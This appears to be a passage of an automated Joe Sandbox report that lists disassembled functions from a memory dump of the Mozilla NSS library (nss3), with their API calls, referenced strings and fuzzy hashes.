Part of subcall function 68D81560: PR_Unlock.NSS3(?,?,?,?,68D50844,?), ref: 68D815B2

Part of subcall function 68D4B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,68D51397,00000000,?,68D4CF93,5B5F5EC0,00000000,?,68D51397,?), ref: 68D4B1CB
Part of subcall function 68D4B1A0: free.MOZGLUE(5B5F5EC0,?,68D4CF93,5B5F5EC0,00000000,?,68D51397,?), ref: 68D4B1D2

Part of subcall function 68D489E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,68D488AE,-00000008), ref: 68D48A04
Part of subcall function 68D489E0: EnterCriticalSection.KERNEL32(?), ref: 68D48A15
Part of subcall function 68D489E0: memset.VCRUNTIME140(68D488AE,00000000,00000132), ref: 68D48A27
Part of subcall function 68D489E0: PR_Unlock.NSS3(?), ref: 68D48A35

Strings

@uU~/, xrefs: 68D70C9F

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID: @uU~/
API String ID: 1601681851-2989128320
Opcode ID: 750e4a1af2b350611b02e9e6b8900c3cc65bdaf096af96c8f198562ed682d9ce
Instruction ID: 082eaf2c23f344ab68e2fee318b6c331924ee65cd4108f5280ff0d32952ae6b9
Opcode Fuzzy Hash: 750e4a1af2b350611b02e9e6b8900c3cc65bdaf096af96c8f198562ed682d9ce
Instruction Fuzzy Hash: BC5183BAD002019FEB109F64EC81A7F37A89F593D8F850465EC1997352FB22ED1586B2

Uniqueness

Uniqueness Score: -1.00%

Function 68D788E0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 68D788FC

Part of subcall function 68D8BE30: SECOID_FindOID_Util.NSS3(68D4311B,00000000,?,68D4311B,?), ref: 68D8BE44

PORT_NewArena_Util.NSS3(00000800), ref: 68D78913

Part of subcall function 68D90FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,68D387ED,00000800,68D2EF74,00000000), ref: 68D91000
Part of subcall function 68D90FF0: PR_NewLock.NSS3(?,00000800,68D2EF74,00000000), ref: 68D91016
Part of subcall function 68D90FF0: PL_InitArenaPool.NSS3(00000000,security,68D387ED,00000008,?,00000800,68D2EF74,00000000), ref: 68D9102B

SEC_ASN1DecodeItem_Util.NSS3(00000000,?,68E5D864,?), ref: 68D78947

Part of subcall function 68D8E200: PR_SetError.NSS3(FFFFE009,00000000), ref: 68D8E245
Part of subcall function 68D8E200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 68D8E254

SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 68D7895B
DER_GetInteger_Util.NSS3(?), ref: 68D78973
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 68D78982
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 68D789EC
PR_SetError.NSS3(FFFFE006,00000000), ref: 68D78A12

Strings

@uU~/, xrefs: 68D788F0

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Util$Arena_Tag_$AlgorithmErrorFindFree$ArenaDecodeInitInteger_Item_LockPoolcalloc
String ID: @uU~/
API String ID: 2145430656-2989128320
Opcode ID: 5987d88c664926fb0cea4833ab90309a70d2b6b1272b0b7c4c8bb1344a482b53
Instruction ID: 13bb87d7df945d21caf0f3f1ed73ec1a925e34eaa7e8eee244db3ce9ec25abbd
Opcode Fuzzy Hash: 5987d88c664926fb0cea4833ab90309a70d2b6b1272b0b7c4c8bb1344a482b53
Instruction Fuzzy Hash: 833159B6E84600D7FB305339BC45B7A32959F913E8FD40639D929D7291FB21C54282B7

Uniqueness

Uniqueness Score: -1.00%

Function 68D6ACC0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 68D6ACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 68D6AD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 68D6AD23

Part of subcall function 68E4D930: PL_strncpyz.NSS3(?,?,?), ref: 68E4D963

PR_LogPrint.NSS3(?,00000000), ref: 68D6AD39

Strings

(CK_INVALID_HANDLE), xrefs: 68D6AD1C
C_MessageDecryptFinal, xrefs: 68D6ACE1
hSession = 0x%x, xrefs: 68D6ACFE, 68D6AD0E
@uU~/, xrefs: 68D6ACCC
nh, xrefs: 68D6AD51, 68D6AD7B

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$@uU~/$C_MessageDecryptFinal$nh
API String ID: 332880674-278952101
Opcode ID: 9afcdb3a8626afe70cab19547ae3e56a228970b476ee7845d4c2a5ed0ecc0a89
Instruction ID: 015f0b2a9c7bbbd954ba9df961e824bda000f918c15535f87bbbe6152f77830a
Opcode Fuzzy Hash: 9afcdb3a8626afe70cab19547ae3e56a228970b476ee7845d4c2a5ed0ecc0a89
Instruction Fuzzy Hash: C5210A76940128DFDF009B54EC84B7E3365EB473A9FC4402AE51DA7251FB709C95CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 68D54CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,68D5AB7F,?,00000000,?), ref: 68D54CB4
EnterCriticalSection.KERNEL32(0000001C,?,68D5AB7F,?,00000000,?), ref: 68D54CC8
TlsGetValue.KERNEL32(?,68D5AB7F,?,00000000,?), ref: 68D54CE0
EnterCriticalSection.KERNEL32(?,?,68D5AB7F,?,00000000,?), ref: 68D54CF4
PL_HashTableLookup.NSS3(?,?,?,68D5AB7F,?,00000000,?), ref: 68D54D03
PR_Unlock.NSS3(?,00000000,?), ref: 68D54D10

Part of subcall function 68DDDD70: TlsGetValue.KERNEL32 ref: 68DDDD8C
Part of subcall function 68DDDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 68DDDDB4

PR_Now.NSS3(?,00000000,?), ref: 68D54D26

Part of subcall function 68DF9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,68E40A27), ref: 68DF9DC6
Part of subcall function 68DF9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,68E40A27), ref: 68DF9DD1
Part of subcall function 68DF9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 68DF9DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 68D54D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 68D54DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 68D54E02

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: 1f0c0c748ba807bf3d9cc403edd5b76848886e19b7a2c2c3f3426c515f9e5fb9
Instruction ID: 56198e73383c6c7f36648ba9b9529d8d643a12852102ab4d667a3a3ece2778be
Opcode Fuzzy Hash: 1f0c0c748ba807bf3d9cc403edd5b76848886e19b7a2c2c3f3426c515f9e5fb9
Instruction Fuzzy Hash: 6241A4F9900601ABEF119F24FC44A2A77A9AF06298F844172EC1987216FB31D935C7B3

Uniqueness

Uniqueness Score: -1.00%

Function 68D589C0 Relevance: 15.1, APIs: 10, Instructions: 84COMMON

Download Yara Rule

APIs

PK11_CreateDigestContext.NSS3(00000004,00000000,00000000,00000000,00000000,?,68D5AE9B,00000000,?,?), ref: 68D589DE
PK11_DigestBegin.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,68D32D6B,?,?,00000000), ref: 68D589EF
PK11_DigestOp.NSS3(00000000,57016AC6,034C08E8,?,00000000,?,?,?,?,?,?,?,?,?,?,68D32D6B), ref: 68D58A02
PK11_DestroyContext.NSS3(00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,68D32D6B,?), ref: 68D58A11

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: K11_$Digest$Context$BeginCreateDestroy
String ID:
API String ID: 407214398-0
Opcode ID: 89dd6883cc3e978fe96b60c8bc615f1bbcc1aa0fbeb1844c7935ebb04d279a90
Instruction ID: ade46671444b8d6d7cadf337d7d19209fca312552563f78d1994525920350cb8
Opcode Fuzzy Hash: 89dd6883cc3e978fe96b60c8bc615f1bbcc1aa0fbeb1844c7935ebb04d279a90
Instruction Fuzzy Hash: B011D2F6A90200A6FF105B66BC81B7B75589B417DDF880037EE19DA242F762D974C2B3

Uniqueness

Uniqueness Score: -1.00%

Function 68DA29E0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 181COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,00000000,00000000,?,?,68DA21DD,00000000), ref: 68DA2A47
SEC_ASN1EncodeInteger_Util.NSS3(?,68DA21DD,00000002,00000000,00000000,?,?,68DA21DD,00000000), ref: 68DA2A60
SECOID_FindOIDByTag_Util.NSS3(00000000,?,?,?,?,00000000,00000000,?,?,68DA21DD,00000000), ref: 68DA2A8E
PK11_KeyGen.NSS3(00000000,?,00000000,83F089CA,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 68DA2AE9
PORT_ArenaMark_Util.NSS3(00000000), ref: 68DA2B0D
PK11_FreeSymKey.NSS3(?), ref: 68DA2B7B
PK11_FreeSymKey.NSS3(?), ref: 68DA2BD6

Strings

@uU~/, xrefs: 68DA29EC

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: K11_Util$Free$ArenaEncodeErrorFindInteger_Mark_Tag_
String ID: @uU~/
API String ID: 1625981074-2989128320
Opcode ID: e5e3073ada160ac37b0ee75b1cd164f86d3d4d362e12600eb889c08e75d94933
Instruction ID: 4bb135473f26520a89eeefbcea61e1807fa9733a95a59a8233f1442ea5a845e9
Opcode Fuzzy Hash: e5e3073ada160ac37b0ee75b1cd164f86d3d4d362e12600eb889c08e75d94933
Instruction Fuzzy Hash: 7451C775E00205DBEB10CF67EC81B6A77B5AF483ACF650024ED29AB291E731E905C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 68D7AC10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,68D7AB3E,?,?,?), ref: 68D7AC35

Part of subcall function 68D5CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 68D5CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,68D7AB3E,?,?,?), ref: 68D7AC55

Part of subcall function 68D910C0: TlsGetValue.KERNEL32(?,68D38802,00000000,00000008,?,68D2EF74,00000000), ref: 68D910F3
Part of subcall function 68D910C0: EnterCriticalSection.KERNEL32(?,?,68D38802,00000000,00000008,?,68D2EF74,00000000), ref: 68D9110C
Part of subcall function 68D910C0: PL_ArenaAllocate.NSS3(?,?,?,68D38802,00000000,00000008,?,68D2EF74,00000000), ref: 68D91141
Part of subcall function 68D910C0: PR_Unlock.NSS3(?,?,?,68D38802,00000000,00000008,?,68D2EF74,00000000), ref: 68D91182
Part of subcall function 68D910C0: TlsGetValue.KERNEL32(?,68D38802,00000000,00000008,?,68D2EF74,00000000), ref: 68D9119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,68D7AB3E,?,?), ref: 68D7AC70

Part of subcall function 68D5E300: TlsGetValue.KERNEL32 ref: 68D5E33C
Part of subcall function 68D5E300: EnterCriticalSection.KERNEL32(?), ref: 68D5E350
Part of subcall function 68D5E300: PR_Unlock.NSS3(?), ref: 68D5E5BC
Part of subcall function 68D5E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 68D5E5CA
Part of subcall function 68D5E300: TlsGetValue.KERNEL32 ref: 68D5E5F2
Part of subcall function 68D5E300: EnterCriticalSection.KERNEL32(?), ref: 68D5E606
Part of subcall function 68D5E300: PORT_Alloc_Util.NSS3(?), ref: 68D5E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 68D7AC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,68D7AB3E), ref: 68D7ACD7
PORT_Alloc_Util.NSS3(?), ref: 68D7AD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 68D7AD2B

Part of subcall function 68D5F360: TlsGetValue.KERNEL32(00000000,?,68D7A904,?), ref: 68D5F38B
Part of subcall function 68D5F360: EnterCriticalSection.KERNEL32(?,?,?,68D7A904,?), ref: 68D5F3A0
Part of subcall function 68D5F360: PR_Unlock.NSS3(?,?,?,?,68D7A904,?), ref: 68D5F3D3

Strings

@uU~/, xrefs: 68D7AC1E

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID: @uU~/
API String ID: 2926855110-2989128320
Opcode ID: 25954582d454b909d34a00b352ea4caa88adef5c6e861156fbdf5a469602bb97
Instruction ID: 08bd8518b0e3a662de9cb0fab3c554db8688ba060c304dbb32677cc1c48999ec
Opcode Fuzzy Hash: 25954582d454b909d34a00b352ea4caa88adef5c6e861156fbdf5a469602bb97
Instruction Fuzzy Hash: D6312BBAE00505AFEB109F259C4497F7766AF843A8B958129E814AB340EB31DD1187B1

Uniqueness

Uniqueness Score: -1.00%

Function 68D38980 Relevance: 13.6, APIs: 9, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,68D37310), ref: 68D389B8

Part of subcall function 68D91200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,68D388A4,00000000,00000000), ref: 68D91228
Part of subcall function 68D91200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 68D91238
Part of subcall function 68D91200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,68D388A4,00000000,00000000), ref: 68D9124B
Part of subcall function 68D91200: PR_CallOnce.NSS3(68E92AA4,68D912D0,00000000,00000000,00000000,?,68D388A4,00000000,00000000), ref: 68D9125D
Part of subcall function 68D91200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 68D9126F
Part of subcall function 68D91200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 68D91280
Part of subcall function 68D91200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 68D9128E
Part of subcall function 68D91200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 68D9129A
Part of subcall function 68D91200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 68D912A1

PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,68D37310), ref: 68D389E6
PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 68D38A00
CERT_CopyRDN.NSS3(00000004,00000000,68D37310,?,?,00000004,?), ref: 68D38A1B
PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 68D38A74
PR_SetError.NSS3(FFFFE005,00000000,00000000,?,00000028,?,?,68D37310), ref: 68D38AAF
PORT_ArenaAlloc_Util.NSS3(00000004,00000008,00000000,?,00000028,?,?,68D37310), ref: 68D38AF3
PORT_ArenaGrow_Util.NSS3(00000004,?,C8850FC0,00000000,00000000,?,00000028,?,?,68D37310), ref: 68D38B1D

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Arena$Util$Alloc_$CriticalFreeGrow_PoolSectionfree$Arena_CallClearCopyDeleteEnterErrorOnceUnlockValue
String ID:
API String ID: 3791662518-0
Opcode ID: 3e718ccd6bab1a6fedfd2d9a6eb7fe1c954d190e0ed5511cbc5e350e8e81dcb0
Instruction ID: a961055c1070f0a40c06b57785774be75fd1d9ad41885ac1cf37167164bf9001
Opcode Fuzzy Hash: 3e718ccd6bab1a6fedfd2d9a6eb7fe1c954d190e0ed5511cbc5e350e8e81dcb0
Instruction Fuzzy Hash: BB51CFB5A40230EFEB118F15DC44B2A77A8EB43798F858158EC29DB391E775E901CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 68CCE890 Relevance: 12.4, APIs: 5, Strings: 3, Instructions: 442stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 68CCE922
memset.VCRUNTIME140(00000000,00000000,?), ref: 68CCE9CF
memcpy.VCRUNTIME140(00000024,?,?), ref: 68CCEA0F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 68CCEB20
memcpy.VCRUNTIME140(?,?,?), ref: 68CCEB57

Strings

number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 68CCEDC2
foreign key on %s should reference only one column of table %T, xrefs: 68CCEE04
unknown column "%s" in foreign key definition, xrefs: 68CCED18

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: memcpystrlen$memset
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 638109778-272990098
Opcode ID: dfce096e1b2f3339b3b738b9aa8de7730fa941d5252cd6f34d5991284c48261f
Instruction ID: 3116ec4702cd06963eb429624d94a88cf8f4f4181cf3ef0a5abf51529a3a94c9
Opcode Fuzzy Hash: dfce096e1b2f3339b3b738b9aa8de7730fa941d5252cd6f34d5991284c48261f
Instruction Fuzzy Hash: 2202A475E00115CFDB04CF99C491AFEBBB2FF8A314F5581A9D815AB351E731A842CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 68D9CCF0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 68D9C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,68D9DAE2,?), ref: 68D9C6C2

PR_Now.NSS3 ref: 68D9CD35

Part of subcall function 68DF9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,68E40A27), ref: 68DF9DC6
Part of subcall function 68DF9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,68E40A27), ref: 68DF9DD1
Part of subcall function 68DF9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 68DF9DED

Part of subcall function 68D86C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,68D31C6F,00000000,00000004,?,?), ref: 68D86C3F

PR_GetCurrentThread.NSS3 ref: 68D9CD54

Part of subcall function 68DF9BF0: TlsGetValue.KERNEL32(?,?,?,68E40A75), ref: 68DF9C07

Part of subcall function 68D87260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,68D31CCC,00000000,00000000,?,?), ref: 68D8729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 68D9CD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 68D9CE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 68D9CE2C

Part of subcall function 68D910C0: TlsGetValue.KERNEL32(?,68D38802,00000000,00000008,?,68D2EF74,00000000), ref: 68D910F3
Part of subcall function 68D910C0: EnterCriticalSection.KERNEL32(?,?,68D38802,00000000,00000008,?,68D2EF74,00000000), ref: 68D9110C
Part of subcall function 68D910C0: PL_ArenaAllocate.NSS3(?,?,?,68D38802,00000000,00000008,?,68D2EF74,00000000), ref: 68D91141
Part of subcall function 68D910C0: PR_Unlock.NSS3(?,?,?,68D38802,00000000,00000008,?,68D2EF74,00000000), ref: 68D91182
Part of subcall function 68D910C0: TlsGetValue.KERNEL32(?,68D38802,00000000,00000008,?,68D2EF74,00000000), ref: 68D9119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 68D9CE40

Part of subcall function 68D914C0: TlsGetValue.KERNEL32 ref: 68D914E0
Part of subcall function 68D914C0: EnterCriticalSection.KERNEL32 ref: 68D914F5
Part of subcall function 68D914C0: PR_Unlock.NSS3 ref: 68D9150D

Part of subcall function 68D9CEE0: PORT_ArenaMark_Util.NSS3(?,68D9CD93,?), ref: 68D9CEEE
Part of subcall function 68D9CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,68D9CD93,?), ref: 68D9CEFC
Part of subcall function 68D9CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,68D9CD93,?), ref: 68D9CF0B
Part of subcall function 68D9CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,68D9CD93,?), ref: 68D9CF1D

Part of subcall function 68D9CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,68D9CD93,?), ref: 68D9CF47
Part of subcall function 68D9CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,68D9CD93,?), ref: 68D9CF67
Part of subcall function 68D9CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,68D9CD93,?,?,?,?,?,?,?,?,?,?,?,68D9CD93,?), ref: 68D9CF78

Strings

@uU~/, xrefs: 68D9CCFC

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

